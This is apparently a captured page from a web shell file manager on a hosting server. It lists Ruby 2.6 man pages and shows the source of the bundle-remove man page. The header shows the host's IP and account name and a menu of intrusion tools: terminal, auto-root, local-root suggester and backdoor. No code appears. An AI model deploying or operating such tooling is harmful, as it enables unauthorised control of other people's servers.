Linux premium71.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
Server IP : 198.187.29.8 & Your IP : 18.191.138.59
Domains :
Cant Read [ /etc/named.conf ]
User : cleahvkv
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby26 /
share /
man /
man1 /
Delete
Unzip
Name
Size
Permission
Date
Action
bundle-add.1
1.3
KB
-rw-r--r--
2022-04-12 11:50
bundle-binstubs.1
1.69
KB
-rw-r--r--
2022-04-12 11:50
bundle-check.1
966
B
-rw-r--r--
2022-04-12 11:50
bundle-clean.1
604
B
-rw-r--r--
2022-04-12 11:50
bundle-config.1
20.92
KB
-rw-r--r--
2022-04-12 11:50
bundle-doctor.1
1.14
KB
-rw-r--r--
2022-04-12 11:50
bundle-exec.1
6.6
KB
-rw-r--r--
2022-04-12 11:50
bundle-gem.1
3.17
KB
-rw-r--r--
2022-04-12 11:50
bundle-info.1
449
B
-rw-r--r--
2022-04-12 11:50
bundle-init.1
1.05
KB
-rw-r--r--
2022-04-12 11:50
bundle-inject.1
738
B
-rw-r--r--
2022-04-12 11:50
bundle-install.1
16.38
KB
-rw-r--r--
2022-04-12 11:50
bundle-list.1
871
B
-rw-r--r--
2022-04-12 11:50
bundle-lock.1
3.12
KB
-rw-r--r--
2022-04-12 11:50
bundle-open.1
581
B
-rw-r--r--
2022-04-12 11:50
bundle-outdated.1
3.72
KB
-rw-r--r--
2022-04-12 11:50
bundle-package.1
3.25
KB
-rw-r--r--
2022-04-12 11:50
bundle-platform.1
1.31
KB
-rw-r--r--
2022-04-12 11:50
bundle-pristine.1
1.64
KB
-rw-r--r--
2022-04-12 11:50
bundle-remove.1
849
B
-rw-r--r--
2022-04-12 11:50
bundle-show.1
690
B
-rw-r--r--
2022-04-12 11:50
bundle-update.1
13.59
KB
-rw-r--r--
2022-04-12 11:50
bundle-viz.1
1.08
KB
-rw-r--r--
2022-04-12 11:50
bundle.1
3.42
KB
-rw-r--r--
2022-04-12 11:50
erb.1
3.25
KB
-rw-r--r--
2022-04-12 11:50
irb.1
3.37
KB
-rw-r--r--
2022-04-12 11:50
ri.1
5.22
KB
-rw-r--r--
2022-04-12 11:50
ruby.1
18.63
KB
-rw-r--r--
2022-04-12 11:50
Save
Rename
.\" generated with Ronn/v0.7.3 .\" http://github.com/rtomayko/ronn/tree/0.7.3 . .TH "BUNDLE\-REMOVE" "1" "November 2018" "" "" . .SH "NAME" \fBbundle\-remove\fR \- Removes gems from the Gemfile . .SH "SYNOPSIS" \fBbundle remove [GEM [GEM \.\.\.]] [\-\-install]\fR . .SH "DESCRIPTION" Removes the given gems from the Gemfile while ensuring that the resulting Gemfile is still valid\. If a gem cannot be removed, a warning is printed\. If a gem is already absent from the Gemfile, and error is raised\. . .SH "OPTIONS" . .TP \fB\-\-install\fR Runs \fBbundle install\fR after the given gems have been removed from the Gemfile, which ensures that both the lockfile and the installed gems on disk are also updated to remove the given gem(s)\. . .P Example: . .P bundle remove rails . .P bundle remove rails rack . .P bundle remove rails rack \-\-install